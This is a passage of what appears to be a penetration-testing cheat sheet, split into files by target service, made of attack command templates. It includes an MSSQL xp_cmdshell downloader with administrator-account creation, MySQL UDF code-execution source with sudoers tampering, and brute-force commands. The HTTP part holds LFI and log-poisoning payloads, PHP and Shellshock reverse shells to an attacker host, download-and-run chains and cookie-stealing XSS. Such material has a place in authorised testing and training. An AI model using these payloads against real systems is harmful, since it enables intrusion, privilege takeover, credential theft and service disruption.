xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs'
go
xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs'
go
xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs'
go
xp_cmdshell 'echo Err.Clear >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs'
go
xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs'
go
xp_cmdshell 'echo http.Send >> wget.vbs'
go
xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs'
go
xp_cmdshell 'echo Set http = Nothing >> wget.vbs'
go
xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs'
go
xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs'
go
xp_cmdshell 'echo strData = "" >> wget.vbs'
go
xp_cmdshell 'echo strBuffer = "" >> wget.vbs'
go
xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs'
go
xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs'
go
xp_cmdshell 'echo Next >> wget.vbs'
go
xp_cmdshell 'echo ts.Close >> wget.vbs'
go
`` Using sqsh
~$ cat ~/.freetds.conf
[mssql1]
host = VAR_TARGET_HOST
port = 27900
tds version = 8.0
~$ sqsh -S mssql1 -U sa
> exec sp_configure "show advanced options", 1
> go
> reconfigure
> go
> exec sp_configure "xp_cmdshell", 1
> go
> reconfigure
> go
> xp_cmdshell "whoami"
> go
> xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add"
> xp_cmdshell "net localgroup administrators VAR_USERNAME /add"
================================================
FILE: Target.Host.Service.DB.MySQL.txt
================================================
`` Scanning
~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST
-- NOTE: mysql-enum is unreliable
`` Password Bruteforcing
~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST
-- With a list of targets
~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql
`` Dump
~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql
`` Extension upload
SELECT @@plugin_dir;
SELECT 0x7f454c...00000 into dumpfile "/var/lib/mysql/udf.so";
CREATE function sys_eval returns string soname 'udf.so';
SELECT * from mysql.func where name = 'sys_eval';
SELECT sys_eval('dir');
DROP function sys_eval;
echo '<?php $sock=fsock[...]$pipes); ?>' | xxd -ps | tr -d '\n'
`` raptor.c
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
$ gcc -fPIC -g -c raptor.c
$ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc
$ xxd -p -c `stat --format="%s" raptor.so` raptor.so
mysql> SELECT '<output of above command>' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'
mysql> CREATE function do_cmd returns integer soname "raptor.so";
mysql> SELECT do_cmd("echo 'root:root'|chpasswd");
gcc -g -c raptor_udf2.c
gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root
mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name | ret | dl | type |
+-----------+-----+----------------+----------+
| do_system | 2 | raptor_udf2-2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('adduser toor');
mysql> select do_system('echo "toor ALL=(ALL) ALL" >> /etc/sudoers');
mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd');
================================================
FILE: Target.Host.Service.DB.PostgreSQL.txt
================================================
`` Scanning
~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv
`` Password Bruteforcing
~$ nmap -p 5432 --script pgsql-brute --script-args userdb=users.txt,passdb=VAR_WORDLIST VAR_TARGET_HOST
~$ hydra -L users.txt -V -P VAR_WORDLIST VAR_TARGET_HOST postgres
`` Dump
-- Dump single database
~$ pg_dump dbname | gzip > dump.gz
-- Dump cluster
~$ pg_dumpall | gzip > dump.gz
`` Database access
~$ psql -h VAR_TARGET_HOST -U postgres
================================================
FILE: Target.Host.Service.FTP.txt
================================================
`` Scanning
~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST
`` Password Bruteforcing
~$ nmap -n -v -p 21 --script ftp-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST
~$ ncrack -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -T 5 VAR_TARGET_HOST -p 21
~$ medusa -h VAR_TARGET_HOST -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -M ftp
`` Massive download
~$ wget --recursive --ftp-user=anonymous --ftp-password=any --no-passive-ftp ftp://VAR_TARGET_HOST
================================================
FILE: Target.Host.Service.HTTP.txt
================================================
`` Initial
`` nikto
`` Less defaults, less intense, no dictionary
~$ nikto -h http://VAR_TARGET_HOST -Plugins "outdated;shellshock;msgs;cookies;cgi;put_del_test;headers;multiple_index;httpoptions;ssl;robots;origin_reflection"
`` All batteries included
~$ nikto -h http://VAR_TARGET_HOST
~$ nikto -h http://VAR_TARGET_HOST -useproxy http://VAR_PROXY_HOST:8881
`` pukpuk
~$ pukpuk -c VAR_TARGET_CIDR -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 81/http 443/https 8000/http 8080/http 8443/https
-- Basic grabbing after using scan_top.sh script and the result HTTP file
~$ pukpuk -l VAR_FILENAME -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 443/https 4443/https 8000/http 8080/http 8081/http 8082/http 8888/http 8443/https 9443/https
-- Extended port list and read targets from file
~$ pukpuk -l VAR_TARGET_LIST -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -p 80/http 81/http 82/http 83/http 443/https 1080/http 1443/https 4443/https 7443/https 8000/http 8001/http 8008/http 8080/http 8081/http 8088/http 8443/https 8888/http 9000/http 9080/http 9443/https 10080/http 10443/https 11443/https 12443/https
`` nmap
~$ nmap VAR_TARGET_HOST -p 80 -v -sV --script "http-sitemap-gen*,http-methods,http-mobile*,http-open*,http-sql*,http-userdir*,http-vhosts,http-webdav*,http-iis*,http-enum*,http-frontpage*,http-useragent*"
`` Path Discovery / Crawling
~$ hakrawler -url VAR_TARGET_HOST -depth 1
`` Path Bruteforcing
`` Look for "hidden" resources, home dirs, useful files etc. Complete step by step chain.
~$ export USERAGENT="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
~$ export TARGET=https://VAR_TARGET_HOST
~$ export EXTENSIONS=$(tr '\n' ',' < ~/lib/brutas/brutas-http-files-extensions-common.txt)
~$ ffuf -w VAR_WORDLIST -H "$USERAGENT" -u $TARGET/FUZZ -mc 200
~$ ffuf -w VAR_WORDLIST -H "$USERAGENT" -u $TARGET/FUZZ -e $EXTENSIONS -mc 200
~$ ffuf -w VAR_WORDLIST -recursion -recursion-depth 5 -H "$USERAGENT" -u $TARGET/FUZZ -e '/' -mc 200,204,401,403,405
~$ ffuf -w VAR_WORDLIST -recursion -recursion-depth 5 -H "$USERAGENT" -u $TARGET/.FUZZ -e '/' -mc 200,204,401,403,405
`` Using a list of paths
~$ while read lin; ffuf -w ~/lib/brutas/brutas-http-files.txt -H "$USERAGENT" -u $lin/FUZZ -e $EXTENSIONS -mc 200; done < paths.txt
`` Generic, follow redirects (-r), adaptive (-ac), silent (-s) and recursive (-recursion)
~$ ffuf -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ -r -ac -s -recursion
`` Slow and peaceful
~$ ffuf -t 10 -p 1 -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ
`` Less intense and a little bit randomized
~$ ffuf -fc 403,302 -p "0.1-2.0" -t 4 -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ
`` Match OK 200 only
~$ ffuf -w VAR_WORDLIST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -u https://VAR_TARGET_HOST/FUZZ -mc 200
`` Match based on response size
~$ ffuf -w VAR_WORDLIST -u https://VAR_TARGET_HOST/script.php?FUZZ=test_value -fs VAR_INTEGER
`` HTTP header fuzzing
~$ ffuf -w VAR_WORDLIST -u https://VAR_TARGET_HOST -H "Host: FUZZ"
`` LFI
`` Automated
~$ dotdotpwn -m http-url -k "root:" -u "http://VAR_TARGET_HOST/?url=TRAVERSAL" -o unix -d 8 -f "/etc/passwd"
~$ dotdotpwn -m http-url -k "mci extensions" -u "http://VAR_TARGET_HOST/?url=TRAVERSAL" -o windows -d 8 -f "windows\win.ini"
`` Basic
?file=../../../../../../../../../var/log/apache/error.log
?file=/etc/passwd/../../../../../../../../../../../../../../../../../..
`` Path Truncation
.php?filename=../../../etc/passwd/././././././././/././././././././././[...]
`` Nullbyte Injection
?file=../../../../etc/passwd%00
?file=../../../../etc/passwd%00jpg
`` Poisoning
`` Headers
.php?filename=../../../proc/self/environ
User-Agent: <?=phpinfo(); ?>
.php?filename[]= HTTP/1.1
Referer: <?=phpinfo();?>
.php?filename=../../../var/log/nginx/error_log
`` SSH
~$ ssh <?=phpinfo();?>@VAR_ATTACKER_HOST
.php?filename=../../../var/log/auth.log
`` SMTP
~$ mail -s "<?=phpinfo();?>" www-data@VAR_ATTACKER_HOST < /dev/null
.php?filename=../../../var/log/www-data
`` curl
~$ curl 'http://VAR_TARGET_HOST/cgi-bin/admin.cgi' -i -s > before
~$ curl 'http://VAR_TARGET_HOST/cgi-bin/admin.cgi?list=../../../../../../../../../../etc/passwd' -i -s > after
~$ diff before after
`` Automated
`` Generic
~$ wapiti -u http://VAR_TARGET_HOST/
~$ commix --url="http://VAR_TARGET_HOST/?url=INJECT_HERE"
~$ commix --url="http://VAR_TARGET_HOST/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=VAR_TARGET_HOST,ip_dst=VAR_TARGET_HOST"
~$ commix --url="http://VAR_TARGET_HOST/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://VAR_TARGET_HOST/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"
~$ commix --url="http://VAR_TARGET_HOST:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" --technique="f" --root-dir="/"
~$ commix --url="http://VAR_TARGET_HOST/cgi-bin/status/" --shellshock
~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"
~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3
~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/referer/referer(classic).php" --level=3
~$ commix --url="http://VAR_TARGET_HOST/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64
~$ commix --url="http://VAR_TARGET_HOST/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'
~$ commix --url="http://VAR_TARGET_HOST/cgi-bin/status" --shellshock --proxy="VAR_PROXY_HOST:3128"
`` Wordpress
~$ wpscan --url VAR_TARGET_HOST -e vt,vp
~$ wpscan --url http://VAR_TARGET_HOST/ --wordlist VAR_WORDLIST --username VAR_USERNAME
`` Joomla
joomscan
`` Fingerprinting
~$ python3 ./wig.py http://VAR_TARGET_HOST/
`` Ideas
`` Bypassing auth with keep-alive
~$ printf 'GET / HTTP/1.1\r\nConnection: keep-alive\r\n\r\n' | ncat --ssl -v VAR_TARGET_HOST VAR_TARGET_PORT
`` BusyBox chain
~$ curl -v --user 'VAR_USERNAME:VAR_PASSWORD' 'http://VAR_TARGET_HOST/command.cgi?ps|wget http://VAR_ATTACKER_HOST/tcpdump -P /tmp%26%26wget http://VAR_ATTACKER_HOST/busybox-mipsel -P /tmp%26%26chmod %2Bx /tmp/tcpdump%26%26chmod %2Bx /tmp/busybox-mipsel%26%26/tmp/tcpdump -n -i any udp -w -|/tmp/busybox-mipsel nc VAR_ATTACKER_HOST 10000'
`` Node.js
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"]
`` Perl
value='||eval `echo -e "YXdrIC...V2L251bGwK" | openssl enc -a -d`;#'
`` PHP wrappers
~$ curl -s --data "<?system('ls -la');?>" "http://VAR_TARGET_HOST/script.php?path=php://input%00" | html2text
.php?page=expect://ls
.php?page=php://filter/resource=/etc/passwd
.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
.php?page=zip:///var/www/images/tmp.zip%23tmp
.php?page=php://filter/read=zlib.deflate/read=convert.base64-encode/resource=/etc/passwd
.php?page=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo==&cmd=ls
.php?page=data:text/plain,<?system($_GET['cmd']);?>&cmd=ls
`` Python decompress
>>> zlib.decompress(base64.b64decode(req), -15)
`` IIS
~$ cadaver http://VAR_TARGET_HOST
dav:/> put alter.asp alter.txt
dav:/> copy alter.txt alter.asp;.txt
`` RCE
~$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=VAR_ATTACKER_HOST LPORT=80 -f elf > /var/www/html/index.html
~$ curl "http://VAR_TARGET_HOST/sync?opt=' w\get VAR_ATTACKER_HOST -P /tmp'
~$ curl "http://VAR_TARGET_HOST/sync?opt=' c\hmod +x /tmp/index.html'
~$ curl "http://VAR_TARGET_HOST/sync?opt=' /tmp/index.html'
`` XHR
var xhr = new XMLHttpRequest();
xhr.open('TRACE', 'http://VAR_TARGET_HOST/', false);
xhr.send(null);
if(200 == xhr.status)
alert(xhr.responseText);
`` Cookies
<img src="error.jpg" onerror="eval('new Image().src=\"http://VAR_TARGET_HOST:8000/\"+ document.cookie;')">
<script>new Image().src="http://VAR_TARGET_HOST:8888/?o="+document.cookie;</script>
>>> s = 'new Image().src=\"http://VAR_TARGET_HOST:8000/\"+ document.cookie;'
>>> PAYLOAD = [ord(c) for c in s]
<img src="error.jpg" onerror="eval(String.fromCharCode(PAYLOAD))">
<script>new Image().src="http://VAR_TARGET_HOST/?o="+document.cookie;</script>
`` Images
`` GIF
GIF98 <?php echo shell_exec("rm /tmp/.kernel;mkfifo /tmp/.kernel;cat /tmp/.kernel|/bin/sh -i 2>&1|nc VAR_ATTACKER_HOST 8000 >/tmp/.kernel"); ?>
`` JPEG
~$ echo 'FFD8FFDB' | xxd -r -p > test.jpg
~$ echo '<?php phpinfo(); ?>' >> test.jpg
`` Paths
- /etc/httpd/logs/acces.log
- /etc/httpd/logs/acces_log
- /etc/httpd/logs/error.log
- /etc/httpd/logs/error_log
- /usr/local/apache/logs/access.log
- /usr/local/apache/logs/access_log
- /usr/local/apache/logs/error.log
- /usr/local/apache/logs/error_log
- /var/log/access.log
- /var/log/access_log
- /var/log/apache/access.log
- /var/log/apache/access_log
- /var/log/apache/error.log
- /var/log/apache/error_log
- /var/log/apache2/access.log
- /var/log/apache2/access_log
- /var/log/apache2/error.log
- /var/log/apache2/error_log
- /var/log/error.log
- /var/log/error_log
- /var/www/logs/access.log
- /var/www/logs/access_log
- /var/www/logs/error.log
- /var/www/logs/error_log
- /var/log/auth.log
- /var/log/cron.log
- /var/log/httpd/access_log
- /var/log/httpd/error_log
- /var/log/messages
- /var/log/secure
- /var/www/config.php
- /var/www/configuration.php
- /var/www/configuration.php
- /var/www/html/inc/header.inc.php
- /var/www/html/sites/default/settings.php
- /var/www/html/wp-config.php
`` Shellshock
`` Tools
~$ nmap VAR_TARGET_HOST -p VAR_TARGET_PORT --script http-shellshock --script-args uri=/cgi-bin/test.cgi
~$ wfuzz -H "User-Agent: () { :;}; echo; echo vulnerable" --ss vulnerable -w VAR_WORDLIST http://VAR_TARGET_HOST/FUZZ
`` Test
GET /cgi-bin/script.cgi HTTP/1.1
() { :;}; echo; echo "VAR_STRING_1": () { :;}; echo; echo "VAR_STRING_2"
Host: VAR_TARGET_HOST
Connection: close
Cookie: () { :;}; echo; echo "VAR_STRING_3"
User-Agent: () { :;}; echo; echo "VAR_STRING_4"
Referer: () { :;}; echo; echo "VAR_STRING_5"
`` Samples
Referer: () { :;}; echo "XXX"; /bin/bash -c "exec /bin/sh 0</dev/tcp/VAR_TARGET_HOST/443 1>&0 2>&0 &"
x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt
x: () { :;}; echo "Hacked" > /var/www/hacked.html
env ENV_VAR_FN=’() { <your function> }; <attacker code here>’
User-agent: () { :;}; echo something>/var/www/html/new_file
() { :;}; /bin/bash -c \"whoami | mail -s 'VAR_TARGET_HOST l' xxxxxxxxxxxxxxxx@gmail.com
() {:;}; ping -c 1 -p VAR_HEX VAR_ATTACKER_HOST
() {:;}; /usr/bin/wget http://VAR_ATTACKER_HOST/VAR_HEX >> `null
() { :;}; /bin/bash -c \"cd /tmp;wget http://VAR_TARGET_HOST/ji;curl -O /tmp/ji http://VAR_TARGET_HOST/ji ; perl /tmp/ji;rm -rf /tmp/ji\"
() { :;}; /bin/bash -c \"/usr/bin/env curl -s http://VAR_TARGET_HOST/cl.py > /tmp/clamd_update; chmod +x /tmp/clamd_update; /tmp/clamd_update > /dev/null& sleep 5; rm -rf /tmp/clamd_update\"
Whatever-Here: () { :;}; echo "XXX"; /bin/bash -c "exec /bin/sh 0</dev/tcp/VAR_TARGET_HOST/VAR_TARGET_PORT 1>&0 2>&0 &"
`` curl
~$ curl -v -X TRACE VAR_TARGET_HOST
~$ curl --user 'VAR_USERNAME:VAR_PASSWORD' 'https://VAR_TARGET_HOST'
~$ curl --verbose --header 'Host: VAR_TARGET_HOST' 'http://VAR_TARGET_HOST/'
~$ curl -v -X OPTIONS http://VAR_TARGET_HOST
~$ curl VAR_TARGET_HOST -s -L | html2text -width '99' | uniq
~$ curl -X POST -H "Content-Type: application/json" -d @data.json http://VAR_TARGET_HOST/script.php
~$ curl -X POST -H "Content-Type: application/json" -d 'VAR_STRING' http://VAR_TARGET_HOST/script.php
~$ curl "http://VAR_TARGET_HOST/sync?opt=' /usr/bin/whi[c]h mk\nod'"
~$ curl "http://VAR_TARGET_HOST/sync?opt=' p\s aux'"
~$ curl "http://VAR_TARGET_HOST/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/nginx.conf'" > nginx.conf
~$ curl -s VAR_TARGET_HOST/users/{1..20}.json
`` WebDAV
`` Tools
~$ davtest -url http://VAR_TARGET_HOST
`` curl
~$ curl -v -X PUT -d @test.txt http://VAR_TARGET_HOST/test.txt
~$ curl -v -X PUT -d '<% out.println("hello");%>' http://VAR_TARGET_HOST/test.jsp
~$ curl -v -X MOVE --header 'Destination:http://VAR_TARGET_HOST/new.txt' 'http://VAR_TARGET_HOST/old.txt'
~$ curl -v -X DELETE http://VAR_TARGET_HOST:8585/uploads/verify.txt
~$ curl -X MKCOL 'https://VAR_TARGET_HOST/new_folder'
~$ curl -u VAR_USERNAME:VAR_PASSWORD -X MKCOL 'http://VAR_TARGET_HOST/webdav/test/'
`` ElasticSearch
~$ curl -X GET http://VAR_TARGET_HOST:9200/_cat/indices?v
~$ curl -X GET http://VAR_TARGET_HOST:9200/VAR_STRING/_search
~$ curl -X POST http://VAR_TARGET_HOST:9200/_shutdown
~$ curl -X POST http://VAR_TARGET_HOST:9200/_cluster/nodes/_master/_shutdown
`` Logstash
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/jvm?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/pipelines?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/os?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/plugins?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/hot_threads?human=true'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/jvm?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/process?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/events?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/pipelines?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/reloads?pretty'
~$ curl -X GET 'http://VAR_TARGET_HOST:9600/_node/stats/os?pretty'
`` Password Bruteforcing
`` POST
~$ hydra VAR_TARGET_HOST http-post-form -V -t 2 -w 30 -f -L usernames.txt -P passwords.txt "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:Login failed"
~$ ffuf -w VAR_WORDLIST -X POST -d "username=admin\&password=FUZZ" -u https://VAR_TARGET_HOST/script.php -fc 401
`` GET with cookie
~$ hydra VAR_TARGET_HOST http-get-form -V -t 2 -l VAR_USERNAME -P VAR_WORDLIST "/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie:security=low;PHPSESSID=VAR_STRING"
`` Non-standard port
~$ hydra VAR_TARGET_HOST http-post-form -I -d -V -t 1 -w 80 -c 1 -W 3 -s 5466 -f -L usernames.txt -e nsr "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:failed:H=User-Agent\: Mozilla/5.0 (X11; Linux x86_64; rv\:52.0) Gecko/20100101 Firefox/52.0:C="
`` Proxied
~$ env HYDRA_PROXY_HTTP=http://localhost:8080 hydra VAR_TARGET_HOST http-post-form -V -t 2 -s 5466 -f -L usernames.txt -P passwords.txt "/admin_loginok.html:username=^USER^&password=^PASS^&username_val=^USER^&password_val=^PASS^&submit_btn=+Login+:Login failed"
~$ proxychains4 -q curl -sv --cookie "username=VAR_USERNAME; password=VAR_PASSWORD" --data "user=%00<?system('ls -la'); die();?>" "http://VAR_TARGET_HOST/script.php" | html2text
`` Wordpress
~$ hydra VAR_TARGET_HOST -V http-form-post -L usernames.txt -P passwords.txt '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
`` Tomcat
~$ ~/lib/pentesting-cookbook/tomcat_brute.py -u VAR_TARGET_URL
`` WebRTC local IP discovery
`` Simplified
window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var pc = new RTCPeerConnection({iceServers:[]}), noop = function(){};
pc.createDataChannel("");
pc.createOffer(pc.setLocalDescription.bind(pc), noop);
pc.onicecandidate = function(ice){
if(!ice || !ice.candidate || !ice.candidate.candidate) return;
var localIp = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate)[1];
console.log('Local IP: ', localIp);
pc.onicecandidate = noop;
};
`` Over STUN request
-- Source: https://github.com/diafygi/webrtc-ips
// <iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
// <script>getIPs(function(ip){console.log(ip);});
function getIPs(callback){
var ip_dups = {};
var RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var useWebKit = !!window.webkitRTCPeerConnection;
if (!RTCPeerConnection) {
var win = iframe.contentWindow;
RTCPeerConnection = win.RTCPeerConnection || win.mozRTCPeerConnection || win.webkitRTCPeerConnection;
useWebKit = !!win.webkitRTCPeerConnection;
}
var mediaConstraints = {
optional: [{RtpDataChannels: true}]
};
var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
var pc = new RTCPeerConnection(servers, mediaConstraints);
function handleCandidate(candidate){
var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
var ip_addr = ip_regex.exec(candidate)[1];
if(ip_dups[ip_addr] === undefined)
callback(ip_addr);
ip_dups[ip_addr] = true;
}
pc.onicecandidate = function(ice){
if(ice.candidate)
handleCandidate(ice.candidate.candidate);
};
pc.createDataChannel("");
pc.createOffer(function(result){
pc.setLocalDescription(result, function(){}, function(){});
}, function(){});
setTimeout(function(){
var lines = pc.localDescription.sdp.split('\n');
lines.forEach(function(line){
if(line.indexOf('a=candidate:') === 0)
handleCandidate(line);
});
}, 1000);
}
`` Popular MIME Types
- application/excel
- application/javascript
- application/msword
- application/octet-stream
- application/pdf
- application/powerpoint
- application/vnd.ms-excel
- application/vnd.ms-powerpoint
- image/bmp
- image/gif
- image/jpeg
- image/png
- text/javascript
- text/plain
`` Popular User-Agent strings
-- Based on https://developers.whatismybrowser.com/useragents/explore/software_type_specific/web-browser/1
`` Windows
`` Chrome
-- ver. 74
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
-- ver. 98
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
`` Internet Explorer
-- ver. 6
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
- Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
-- ver. 7
- Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
-- ver. 9
- Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; KTXN)
- Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
-- ver. 11
- Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
`` Edge
-- ver. 44
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
-- ver. 96
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62
`` Linux
`` Chrome
-- ver. 44
- Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
`` Mirroring
`` Relatively peaceful, capturing *.war only
~$ wget --convert-links --no-parent -m -e robots=off -r -A *.war --limit-rate=250k -w2 http://VAR_TARGET_HOST:8080/repository
================================================
FILE: Target.Host.Service.IDENT.txt
================================================
`` User enumeration
~$ nmap -n -v -p 113 --script auth-owners VAR_TARGET_HOST
================================================
FILE: Target.Host.Service.LDAP.txt
================================================
`` Scanning
`` Anonymous
~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b "dc=VAR_DOMAIN,dc=com"
LDAPExplorertool2
`` Authenticated
~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -D "CN=Administrator, CN=User, DC=VAR_DOMAIN, DC=com" -b "DC=VAR_DOMAIN, DC=com" -W
================================================
FILE: Target.Host.Service.MSRPC.txt
================================================
`` Scanning
~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST
`` Connect
~$ rpcclient -U VAR_TARGET_DOMAIN/VAR_USERNAME VAR_TARGET_HOST
`` Version of the target Windows machine
rpcclient $> srvinfo
`` Specific user / computer information by RID
rpcclient $> queryuser VAR_RID
`` Domain
